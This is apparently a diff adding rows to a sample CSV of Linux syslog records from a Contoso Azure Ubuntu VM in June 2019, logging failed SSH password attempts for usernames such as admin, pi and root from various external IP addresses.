+1252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:11,UbuntuDevEnv,2019-06-26 19:01:11,auth,UbuntuDevEnv,info,Received disconnect from 54.222.204.1 port 35030:11: Bye Bye [preauth],71483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.222.204.1,35030,,
+1253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:42,UbuntuDevEnv,2019-06-26 19:01:41,auth,UbuntuDevEnv,info,Invalid user spencer from 165.227.41.202 port 38516,71633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spencer,165.227.41.2,38516,,
+1254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:42,UbuntuDevEnv,2019-06-26 19:01:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,71633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:42,UbuntuDevEnv,2019-06-26 19:01:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:44,UbuntuDevEnv,2019-06-26 19:01:44,auth,UbuntuDevEnv,info,Failed password for invalid user spencer from 165.227.41.202 port 38516 ssh2,71633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spencer,165.227.41.2,38516,,
+1257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:45,UbuntuDevEnv,2019-06-26 19:01:44,auth,UbuntuDevEnv,info,Disconnected from invalid user spencer 165.227.41.202 port 38516 [preauth],71633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spencer,165.227.41.2,38516,,
+1258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:01:45,UbuntuDevEnv,2019-06-26 19:01:44,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 38516:11: Bye Bye [preauth],71633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,38516,,
+1259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:03:31,UbuntuDevEnv,2019-06-26 19:03:30,auth,UbuntuDevEnv,info,Invalid user cyrille from 165.227.41.202 port 57592,72010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyrille,165.227.41.2,57592,,
+1260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:03:31,UbuntuDevEnv,2019-06-26 19:03:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,72010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:03:31,UbuntuDevEnv,2019-06-26 19:03:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:03:33,UbuntuDevEnv,2019-06-26 19:03:32,auth,UbuntuDevEnv,info,Failed password for invalid user cyrille from 165.227.41.202 port 57592 ssh2,72010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyrille,165.227.41.2,57592,,
+1263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:03:33,UbuntuDevEnv,2019-06-26 19:03:33,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 57592:11: Bye Bye [preauth],72010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,57592,,
+1264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 19:03:33,UbuntuDevEnv,2019-06-26 19:03:33,auth,UbuntuDevEnv,info,Disconnected from invalid user cyrille 165.227.41.202 port 57592 [preauth],72010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyrille,165.227.41.2,57592,,
+1265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:45,UbuntuDevEnv,2019-06-28 00:17:44,auth,UbuntuDevEnv,info,Invalid user admin from 113.178.43.151 port 35738,26521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,113.178.43.1,35738,,
+1266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:46,UbuntuDevEnv,2019-06-28 00:17:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=113.178.43.151,26521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,113.178.43.1,,0,
+1267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:46,UbuntuDevEnv,2019-06-28 00:17:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,26521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:48,UbuntuDevEnv,2019-06-28 00:17:47,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 113.178.43.151 port 35738 ssh2,26521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,113.178.43.1,35738,,
+1269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:48,UbuntuDevEnv,2019-06-28 00:17:48,auth,UbuntuDevEnv,info,Connection closed by invalid user admin 113.178.43.151 port 35738 [preauth],26521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,113.178.43.1,35738,,invalid
+1270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:54,UbuntuDevEnv,2019-06-28 00:17:53,auth,UbuntuDevEnv,info,Invalid user admin from 171.241.226.202 port 51546,26547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,171.241.226.2,51546,,
+1271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:54,UbuntuDevEnv,2019-06-28 00:17:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.241.226.202,26547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.241.226.2,,0,
+1272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:54,UbuntuDevEnv,2019-06-28 00:17:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,26547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:55,UbuntuDevEnv,2019-06-28 00:17:55,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 171.241.226.202 port 51546 ssh2,26547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,171.241.226.2,51546,,
+1274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 00:17:56,UbuntuDevEnv,2019-06-28 00:17:56,auth,UbuntuDevEnv,info,Connection closed by invalid user admin 171.241.226.202 port 51546 [preauth],26547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,171.241.226.2,51546,,invalid
+1275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:00:09,UbuntuDevEnv,2019-06-28 01:00:09,auth,UbuntuDevEnv,info,Connection closed by 34.77.134.205 port 44944 [preauth],35993,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,34.77.134.2,44944,,
+1276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:01:17,UbuntuDevEnv,2019-06-28 01:01:17,auth,UbuntuDevEnv,info,Connection closed by 209.17.96.98 port 57037 [preauth],36264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,209.17.96.9,57037,,
+1277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:13:52,UbuntuDevEnv,2019-06-28 01:13:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=110.228.206.243  user=root,38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,110.228.206.2,,0,
+1278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:13:54,UbuntuDevEnv,2019-06-28 01:13:54,auth,UbuntuDevEnv,info,Failed password for root from 110.228.206.243 port 54669 ssh2,38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,110.228.206.2,54669,,
+1279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:14:01,UbuntuDevEnv,2019-06-28 01:13:58,auth,UbuntuDevEnv,info,Failed password for root from 110.228.206.243 port 54669 ssh2,38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,110.228.206.2,54669,,
+1280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:14:02,UbuntuDevEnv,2019-06-28 01:14:02,auth,UbuntuDevEnv,info,Failed password for root from 110.228.206.243 port 54669 ssh2,38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,110.228.206.2,54669,,
+1281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:14:10,UbuntuDevEnv,2019-06-28 01:14:06,auth,UbuntuDevEnv,info,Failed password for root from 110.228.206.243 port 54669 ssh2,38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,110.228.206.2,54669,,
+1282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:14:10,UbuntuDevEnv,2019-06-28 01:14:09,auth,UbuntuDevEnv,info,Failed password for root from 110.228.206.243 port 54669 ssh2,38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,110.228.206.2,54669,,
+1283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:14:15,UbuntuDevEnv,2019-06-28 01:14:15,auth,UbuntuDevEnv,info,Failed password for root from 110.228.206.243 port 54669 ssh2,38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,110.228.206.2,54669,,
+1284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:14:15,UbuntuDevEnv,2019-06-28 01:14:15,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:14:15,UbuntuDevEnv,2019-06-28 01:14:15,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=110.228.206.243  user=root,38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,110.228.206.2,,0,
+1286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:14:15,UbuntuDevEnv,2019-06-28 01:14:15,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 110.228.206.243 port 54669 ssh2 [preauth],38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,110.228.206.2,54669,,
+1287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:14:15,UbuntuDevEnv,2019-06-28 01:14:15,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 110.228.206.243 port 54669: Too many authentication failures [preauth],38909,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,110.228.206.2,54669,,
+1288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:24:11,UbuntuDevEnv,2019-06-28 02:24:11,auth,UbuntuDevEnv,info,Connection closed by 45.67.14.164 port 45134 [preauth],54575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.67.14.1,45134,,
+1289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:38:10,UbuntuDevEnv,2019-06-28 02:38:10,auth,UbuntuDevEnv,info,Did not receive identification string from 209.17.96.98 port 51964,58012,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,209.17.96.9,51964,,
+1290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:54,UbuntuDevEnv,2019-06-28 02:51:53,auth,UbuntuDevEnv,info,Invalid user pi from 79.42.191.97 port 34000,60963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,79.42.191.9,34000,,
+1291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:54,UbuntuDevEnv,2019-06-28 02:51:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:54,UbuntuDevEnv,2019-06-28 02:51:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=79.42.191.97,60963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,79.42.191.9,,0,
+1293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:54,UbuntuDevEnv,2019-06-28 02:51:54,auth,UbuntuDevEnv,info,Invalid user pi from 79.42.191.97 port 34004,60965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,79.42.191.9,34004,,
+1294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:54,UbuntuDevEnv,2019-06-28 02:51:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=79.42.191.97,60965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,79.42.191.9,,0,
+1295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:54,UbuntuDevEnv,2019-06-28 02:51:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:56,UbuntuDevEnv,2019-06-28 02:51:56,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 79.42.191.97 port 34004 ssh2,60965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,79.42.191.9,34004,,
+1297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:56,UbuntuDevEnv,2019-06-28 02:51:56,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 79.42.191.97 port 34000 ssh2,60963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,79.42.191.9,34000,,
+1298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:56,UbuntuDevEnv,2019-06-28 02:51:56,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 79.42.191.97 port 34004 [preauth],60965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,79.42.191.9,34004,,invalid
+1299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 02:51:56,UbuntuDevEnv,2019-06-28 02:51:56,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 79.42.191.97 port 34000 [preauth],60963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,79.42.191.9,34000,,invalid
+1300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:29,UbuntuDevEnv,2019-06-28 04:40:29,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 37460,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37460,,
+1301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:29,UbuntuDevEnv,2019-06-28 04:40:29,auth,UbuntuDevEnv,info,Failed none for invalid user admin from 193.201.224.232 port 37460 ssh2,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37460,,
+1302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:29,UbuntuDevEnv,2019-06-28 04:40:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:29,UbuntuDevEnv,2019-06-28 04:40:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:32,UbuntuDevEnv,2019-06-28 04:40:31,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37460 ssh2,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37460,,
+1305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:35,UbuntuDevEnv,2019-06-28 04:40:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:37,UbuntuDevEnv,2019-06-28 04:40:37,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37460 ssh2,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37460,,
+1307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:37,UbuntuDevEnv,2019-06-28 04:40:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:39,UbuntuDevEnv,2019-06-28 04:40:38,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37460 ssh2,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37460,,
+1309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:39,UbuntuDevEnv,2019-06-28 04:40:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:40,UbuntuDevEnv,2019-06-28 04:40:39,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37460 ssh2,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37460,,
+1311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:40:40,UbuntuDevEnv,2019-06-28 04:40:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
